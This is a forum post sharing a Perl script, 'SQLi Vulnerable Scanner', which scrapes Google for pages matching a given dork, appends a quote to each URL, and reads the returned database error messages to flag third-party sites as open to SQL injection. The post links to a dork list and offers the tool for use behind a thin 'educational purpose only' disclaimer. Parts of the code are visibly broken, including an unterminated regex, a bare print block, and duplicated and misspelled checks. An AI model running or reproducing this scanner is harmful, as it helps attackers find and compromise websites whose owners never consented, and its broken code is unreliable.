13 Years of Service
24%
Code:
>#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner .:.
# .:. Version : 4.0 fixed (01/12/2012) .:.
# .:. Author : Metropolis .:.
# .:. Home : https://www.metropolis.fr.cr/ .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection .:.
# .:. MSAccess Injection .:.
# .:. MSSQL Injection .:.
# .:. Oracle Injection .:.
# .:. Blind Injection .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Feel free to do whatever you want with this code!
# Enjoy!
# Sql Injection Dork List :
# http://pastebin.com/eHG8eC7z
use LWP::UserAgent;
use Getopt::Std;
system("clear");
getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
$opts{'p'} = 1;
}
print
___________
|.---------.|
|| ||
|| scanner ||
|| ||
|'---------'|
`)__ ____('
[=== -- o ]--.
__'---------'__ \
[::::::::::: :::] )
`""'"""""'""""`/T\
\_/
Metropolis_intro
system('COLOR A');
print "\n\n[script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
$t = "http://www.google.com/search?hl=com&q=".$opts{'k'}."&btnG=Search&start=".$start;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0");
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/ foreach $line(@stuff)
{
if($line =~/(.*) class=l/ig)
{
$out = $1;
$out =~ s/"//g;
$out =~s/$/\'/;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/SQL syntax/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
{print "$out Vulnerable MS Access!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
{print "$out Vulnerable MSSQL!\n";}
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out Vulnerable Blind Possible!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out Vulnerable Oracle!\n";}
elsif($error =~m/Warning: mysql_fetch_assoc()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: session_start()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: getimagesize()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: is_writable()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: getimagesize()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: Unknown()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: session_start()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: mysql_result()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: mysql_query()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: mysql_num_rows()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: array_merge()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: preg_match()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: ilesize()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: filesize()/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Warning: require()/)
{print "$out Vulnerable MySQL!\n";}
}
}
}
}
This link is hidden for visitors. Please Log in or register now.